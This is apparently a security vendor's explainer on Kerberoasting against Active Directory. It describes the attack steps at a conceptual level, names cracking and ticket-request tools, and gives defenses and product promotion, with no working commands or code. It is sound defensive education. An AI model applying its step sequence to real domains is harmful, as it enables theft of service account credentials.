Kerberoasting Attacks: What They Are and How to Defend

What is a Kerberoasting attack?

Kerberoasting is a post-exploitation attack technique targeting the Kerberos authentication protocol, enabling adversaries to extract encrypted service account credentials from Active Directory.

In such an attack, an authenticated domain user requests a Kerberos ticket for a Service Principal Name (SPN). The retrieved Kerberos ticket is encrypted using a hash derived from the service account’s password. The adversary then works offline to crack the password hash, often using brute-force techniques. Once the plaintext credentials of the service account are obtained, the adversary can impersonate the account owner and inherit access to any systems, assets, or networks granted to the compromised account.

Kerberoasting attacks are difficult to detect because:

• Many traditional cybersecurity tools and solutions are not designed to monitor or analyze the behavior and activity of approved users.
• Because Kerberoasting does not rely on malware, traditional antivirus solutions are ineffective at detecting it. However, identity-based threat detection solutions and EDR tools can help identify unusual ticket requests and cracking attempts.

Why are Kerberoasting attacks so prevalent?

Adversaries go to great lengths to access user credentials via techniques like Kerberoasting because the ability to pose as a legitimate user helps the attacker avoid detection while advancing the attack path. After impersonation via credential theft, the adversary has access to any system, service or network the account is entitled to. Skilled attackers can also attempt to elevate their account privileges and move laterally throughout the network, collecting other account credentials, setting backdoors for future access and stealing data along the way.

How do Kerberoasting attacks work?

Kerberoasting attacks exploit a combination of weak or easily guessable service account passwords, particularly when older encryption standards like RC4 are used. These attacks typically follow the process outlined below:

1. A threat actor, using any valid domain user credentials, can use a variety of tools to identify AD accounts that have SPNs (Service Principal Names) tied to them.  
2. The threat actor then requests a Kerberos service ticket for one or more of these identified accounts from the ticket granting service (TGS) using tools like GhostPack’s Rubeus or SecureAuth Corporation’s GetUserSPNs.py.
3. The threat actor receives a ticket from the Kerberos key distribution center (KDC). The ticket is encrypted with a hashed version of the account’s password.
4. The threat actor captures the TGS ticket and takes it offline.
5. The threat actor attempts to crack the SPN credential hash to obtain the service account’s plaintext password using brute force techniques or tools like Hashcat or JohnTheRipper.
6. With the service account password in hand, the threat actor attempts to authenticate as the service account and is granted access to any service, network or system associated with the compromised account.
7. The attacker is then able to steal data, escalate privileges, or set backdoors on the network to ensure future access.

A few things to keep in mind:

• Kerberoasting attacks do not require a Domain Admin account or an account that has elevated privileges. In fact, any Domain User account can be used in this attack type since any account can request service tickets from the TGS.
• Kerberoasting requires the adversary to have existing access to a user account in order to request tickets from the KDC. This access can be achieved from a variety of methods, such as social engineering, malware or even purchasing user credentials on the dark web.
• The SPN can be linked to either a host-based or domain user account. Host-based SPNs are not vulnerable to Kerberoasting attacks because the password is a long, complex key that is refreshed every 30 days or less. These complex, randomly generated passwords are difficult to crack, even with advanced password-cracking tools and brute-force techniques. User account SPN passwords, on the other hand, are selected by humans and therefore often share the same vulnerabilities as other manually created passwords. This is to say that the SPN password may be considered weak, common, outdated, recycled, or reused. Advanced tools can often crack these passwords in a matter of hours.
• Kerberoasting attacks also exploit an architecture flaw, in that any authenticated domain user can initiate a TGS request for any service on the network. The domain controller that is the recipient of the request typically does not check to see if the user is authorized to access this service. Because the domain controller does not verify whether the requesting user should be allowed to request a service ticket for a particular SPN, adversaries can obtain tickets for any service account and attempt to crack them offline.

How to detect and stop Kerberoasting attacks

While traditional cybersecurity measures may struggle to detect Kerberoasting attacks in real-time, organizations can adopt several strategies to enhance their security posture and mitigate potential damage:

1. Develop and deploy a comprehensive dentity ecurity strategy and toolset

To enhance their security posture, organizations should develop and deploy a complete identity security strategy and tool set.

Identity security is a comprehensive solution that protects all types of identities within the enterprise—human or machine, on-prem or hybrid, regular or privileged—to detect and prevent identity-driven breaches, especially when adversaries manage to bypass endpoint security measures. As part of the dentity ecurity strategy, organizations should:

Ensure strong password hygiene: One of the best ways to reduce the risk of a Kerberoasting attack is to require users to create strong passwords, especially for service accounts that have SPNs related to them. Strong passwords should be:

• Complex: Comprised of at least 14 characters, including a mix of uppercase and lowercase letters, numbers, and special characters
• Random: Avoiding recognizable words, phrases, or patterns
• Regularly updated: Rotated periodically to reduce the window of opportunity for attackers

Long, complex, random passwords are exponentially more difficult for password cracking tools to breach; frequently updated passwords limit the amount of time adversaries have to crack password hashes.

The IT team should ensure that all service accounts have enabled "This account supports Kerberos AES 128/256 bit encryption." When AES encryption is used to encrypt Kerberos service tickets, a stronger password hash is also used, which makes password cracking much more difficult.

• Identify privileged service accounts: While any account can be subject to a Kerberoasting attack, admin accounts remain the most vulnerable because they will grant attackers higher levels of access.
• Remove SPNs from human accounts: Ensure that Service Principal Names (SPNs) are not registered to user accounts, as this can inadvertently expose them to Kerberoasting attacks. SPNs are sometimes assigned to user accounts when administrators or developers install services, either manually or automatically during software setup. This practice can leave accounts unnecessarily vulnerable to Kerberoasting attacks. Instead, use dedicated service accounts or Group Managed Service Accounts (gMSAs) to reduce risk.
• Implement Group Managed Service Accounts (gMSAs): Utilizing gMSAs provides automatic password management and enhanced security controls, reducing the risk associated with manual password management.
• Monitor Kerberos ticket requests: Regularly audit and monitor Kerberos ticket requests to detect unusual patterns indicative of an attack. Look for anomalies such as an excessive number of TGS requests in a short timeframe, requests for high-privilege accounts, or attempts originating from unusual hosts. Unusual spikes in ticket requests or repeated attempts to request service tickets can be a red flag.
• Employ the principle of least privilege: Restrict service accounts to the minimum necessary privileges required for their function. Reducing unnecessary permissions limits the impact of a compromised account and helps prevent lateral movement by attackers.
• Require multi-factor authentication (MFA): Implementing MFA adds an additional layer of security, making it more difficult for attackers to leverage stolen credentials.

Unfortunately, many organizations may not have full visibility into all existing privileged accounts, especially those that are old and unused. Organizations can use tools like BloodHound to analyze Active Directory relationships and identify service accounts with elevated privileges. The data gathered by BloodHound is stored in a neo4j database, which can be directly queried using Cipher query language. The two cipher queries shown below can help identify which service accounts are granted administrative privileges. The first query returns service accounts and sorts them by the number of hosts that have explicit or group-delegated local administrative privileges. The second query returns service accounts belonging to a specific Active Directory user group, which in this case is the Domain Admins group.

• Integrate the identity security solution: The identity security solution should also integrate with the organization’s existing Identity and Access Management (IAM) tools and processes, as well as a Zero Trust architecture.

CrowdStrike Falcon® Identity Protection tools offer full identity audits and understanding of accounts, protocols, and services accessed by each. The Falcon platform integrates with partner MFA/IAM solutions to enhance identity security and enforce risk-based authentication.

2. Add proactive threat hunting

True proactive threat hunting, such as Crowdstrike Falcon OverWatch™, enables hunting 24/7 for unknown and stealthy attacks that utilize stolen credentials and are conducted under the guise of legitimate users. These are the types of attacks that standard measures can miss. Employing the expertise gained from daily “hand-to-hand combat” with sophisticated advanced persistent threat (APT) actors, the OverWatch team finds and tracks millions of subtle hunting leads daily to validate if they are legitimate or malicious, alerting customers when necessary and avoiding false positives.

3. Enable true next-gen endpoint protection

Credential access is a popular technique used by attackers because it is highly effective. Organizations should take the threat of credential theft seriously and implement strategies to avoid victimization at the endpoint level. Employing a next-generation endpoint security solution, such as the CrowdStrike Falcon® platform, is critical for detecting and preventing Kerberoasting attacks. Falcon’s identity-based threat detection can identify abnormal authentication behaviors, detect unusual Kerberos ticket requests, and flag credential misuse in real-time—helping organizations stop identity-based threats before they escalate.

CrowdStrike's approach and expertise in Kerberoasting prevention

CrowdStrike frequently observes adversaries using valid account credentials across the attack lifecycle. In the most recent MITRE Engenuity ATT&CK Evaluation, the Falcon platform was revealed to be highly effective at detecting credential-based attacks, such as Kerberoasting.

At the outset of the evaluation, the Falcon platform immediately identified that breached passwords and compromised accounts were being used to request access to the system. This prevented the independent test evaluator from gaining initial access to the environment — effectively stopping the test before it could even start and making CrowdStrike Falcon® the only solution among those being evaluated where a protection component in the platform had to be disabled for the test to continue.

Even after our identity protection capabilities were disabled, the Falcon platform still achieved 100% prevention across all nine steps of the MITRE Attack framework.

Protection from attacks that leverage stolen or compromised credentials is especially important in today’s risk landscape. According to the latest CrowdStrike Global Threat Report, access broker advertisements increased 50% year-over-year. Stopping the adversary in real time and preventing attacks from progressing requires a unified approach to security that enforces Zero Trust on the endpoint, the identity and the data.